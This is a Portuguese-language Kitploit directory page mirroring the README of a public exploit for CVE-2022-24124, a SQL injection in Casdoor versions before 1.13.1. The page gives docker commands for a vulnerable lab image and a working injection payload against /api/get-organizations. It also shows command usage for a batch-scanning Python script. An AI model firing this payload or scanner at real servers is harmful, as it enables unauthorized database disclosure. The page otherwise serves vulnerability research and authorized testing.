Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-24124 — Exploit do CVE-2022-24124 | Kitploit
Ferramentas/GitHubGitHub/b1gdog/cve-2022-24124
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubb1gdog/cve-2022-24124

CVE-2022-24124

Exploit do CVE-2022-24124

Ver Repositório
22há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prefácio

O Casdoor é uma plataforma centralizada de autenticação de logon único (SSO) baseada em OAuth 2.0/OIDC


Identificadores

CVE ID: CVE-2022-24124

CNPD ID: CNPD-202201-7304


Versões Afetadas

Nível de risco: Alto ( 7.5 HIGH )

POC/EXP: Divulgado publicamente

Casdoor < Casdoor 1.13.1 // Todas as versões anteriores à 1.13.1 são afetadas


Resumo da Vulnerabilidade

Esta vulnerabilidade é do tipo injeção de SQL. A API de consulta apresenta uma vulnerabilidade de injeção de SQL relacionada aos parâmetros de campo e valor, como demonstrado em api/get-organizations.


Reprodução

Baixar a imagem da vulnerabilidade

docker pull vulfocus/casdoor:1.13.0

Baixar docker

Iniciar o ambiente vulnerável

docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

dockerRun

Abrir a página do ambiente vulnerável

Baixar ferramenta

http

Usar o POC para construir o payload

POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

1661963474975


Script de Verificação em Um Clique

Aviso: A ferramenta destina-se exclusivamente a pesquisa de segurança ou testes de penetração autorizados. As consequências de usos ilegais são de responsabilidade do usuário; o autor não assume qualquer responsabilidade, direta ou indireta.

root@kitploit:~
python3 CVE-2022-24124.py -h

image

root@kitploit:~
python3 CVE-2022-24124.py -u http://127.0.0.1

image

root@kitploit:~
python3 CVE-2022-24124.py -f urls.txt

image


Informações Relacionadas

https://nvd.nist.gov/vuln/detail/CVE-2022-24124

https://github.com/ColdFusionX/CVE-2022-24124

https://github.com/0xAbbarhSF/CVE-2022-24124

Inspirado em https://www.t00ls.com/thread-66989-1-1.html

Escrevi uma versão em Python como exercício e adicionei um recurso de verificação em lote.